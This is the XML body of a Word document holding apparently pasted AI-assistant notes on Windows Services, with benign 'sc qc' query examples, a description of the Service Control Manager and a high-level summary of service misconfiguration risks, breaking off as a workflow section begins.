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D7D9" w14:textId="60D983DF" w:rsidR="0040643E" w:rsidRDefault="00C9674C" w:rsidP="00C9674C">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F43F21" w14:textId="77777777" w:rsidR="00C9674C" w:rsidRDefault="00C9674C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A9BBA37" w14:textId="13A4F58E" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="66BA7992" w14:textId="77777777" w:rsidR="002A3003" w:rsidRDefault="005F49FC" w:rsidP="002A3003">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Introduction:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307B8CA7" w14:textId="67EF69CB" w:rsidR="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="002A3003">
      <w:r w:rsidRPr="005F49FC">
        <w:br/>
        <w:t>Windows Services are essential background programs that run independently of user sessions, often starting automatically during the boot process. Misconfigurations in these services are a common attack vector that can lead to arbitrary code execution or privilege escalation, even on fully patched Windows systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3549EF5C" w14:textId="77777777" w:rsidR="002A3003" w:rsidRPr="005F49FC" w:rsidRDefault="002A3003" w:rsidP="002A3003"/>
    <w:p w14:paraId="0ECF9EEA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>What is a Windows Service?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E102BFB" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>A Windows Service is a program that runs in the background without user interaction, similar to UNIX daemons.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D742621" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>It usually consists of one or more binary files (executables or DLLs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE7BA0C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Services can be kernel-mode drivers, file system drivers, or user-mode processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D93415" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Services can start at various boot stages: automatically, manually (demand start), or disabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EAFB551" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Types of Windows Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CB93EF" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kernel Drivers:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Low-level drivers operating in kernel mode (e.g., HTTP.sys for HTTP protocol stack).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF6F171" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Mode Services:</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> Run in their own process or share a process with other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3599700A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Example service types can be queried using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> qc &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>service_name</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>&gt; command.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245EE68F" w14:textId="77777777" w:rsidR="002A3003" w:rsidRPr="005F49FC" w:rsidRDefault="002A3003" w:rsidP="002A3003"/>
    <w:p w14:paraId="5A6C105D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Examples:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBCACBA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kernel Driver Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="273B5FD2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">C:\Windows\system32&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> qc http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD7C5B2" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">[SC] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>QueryServiceConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC7FF4E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t>SERVICE_NAME: http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069A0B50" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  TYPE             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>1  KERNEL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_DRIVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB0A379" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  START_TYPE       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>3  DEMAND</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>_START</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="397C47A0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  ERROR_CONTROL    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>1  NORMAL</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6FD4A9D3" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  BINARY_PATH_NAME </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> system32\drivers\HTTP.sys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8408A6" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="00A26590">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  DISPLAY_NAME     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004CB208" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>This service runs as a kernel driver and starts on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42155F1C" w14:textId="77777777" w:rsidR="002A3003" w:rsidRPr="005F49FC" w:rsidRDefault="002A3003" w:rsidP="002A3003"/>
    <w:p w14:paraId="19569BB3" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User-Mode Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9FDDC0" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">C:\Windows\system32&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>sc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> qc </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>usersvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="520AC7AD" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">[SC] </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>QueryServiceConfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="029B1B5B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SERVICE_NAME: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>usersvc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="13752DEE" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  TYPE             </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>110  WIN</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>32_OWN_PROCESS (interactive)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FBBF6" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  START_TYPE       </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> 3    DEMAND_START</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A9534" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  ERROR_CONTROL    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> 1    NORMAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D8A8E49" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  BINARY_PATH_NAME </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> C:\servicedir\svc.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1781484F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  DISPLAY_NAME     </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>UserService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="55BFC49B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">  SERVICE_START_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>NAME :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38E65A35" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">This is a standard user-mode service running in its own process under the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>LocalSystem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F6C4E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SCM):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688AF05C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>The SCM is a core OS component responsible for managing Windows Services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533D55C" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>It handles starting, stopping, and configuring services and ensures their proper lifecycle management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208CFF65" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="00000000" w:rsidP="005F49FC">
      <w:r>
        <w:pict w14:anchorId="4D757823">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2E786B" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary of Security Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCE7995" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Windows Services run with various privilege levels, sometimes SYSTEM-level, making them high-value targets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751B4BBA" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Misconfigured services, such as those with insecure file permissions, unquoted service paths, or weak service start types, can allow attackers to execute arbitrary code or escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33350F7D" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>Proper configuration, monitoring, and patching of services are crucial to maintaining system security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159FFE10" w14:textId="48EE9F7F" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="35E26283" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">If you want, I can also explain the typical </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>workflow of how a Windows Service operates</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> or dive deeper into common </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack vectors and mitigation strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> related to Windows Services. Would you like that?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761F376B" w14:textId="77777777" w:rsidR="00C9674C" w:rsidRDefault="00C9674C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2941C852" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRDefault="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BCA81E" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve">Great! Here’s a detailed explanation of the </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>typical workflow of a Windows Service</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> plus common </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attack vectors</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>mitigation strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="005F49FC">
        <w:t xml:space="preserve"> related to Windows Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A6190" w14:textId="7DEA4EFD" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC"/>
    <w:p w14:paraId="74CDA2E8" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Service Workflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FEF9712" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Registration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75833985" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>When a service is installed, its configuration is registered in the Windows Registry under HKLM\SYSTEM\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>CurrentControlSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005F49FC">
        <w:t>\Services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4642950F" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:t>This includes the service name, binary path, start type, dependencies, and account used to run the service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="035D301A" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Service Control Manager (SCM) Initialization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290B0C25" w14:textId="77777777" w:rsidR="005F49FC" w:rsidRPr="005F49FC" w:rsidRDefault="005F49FC" w:rsidP="005F49FC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005F49FC">
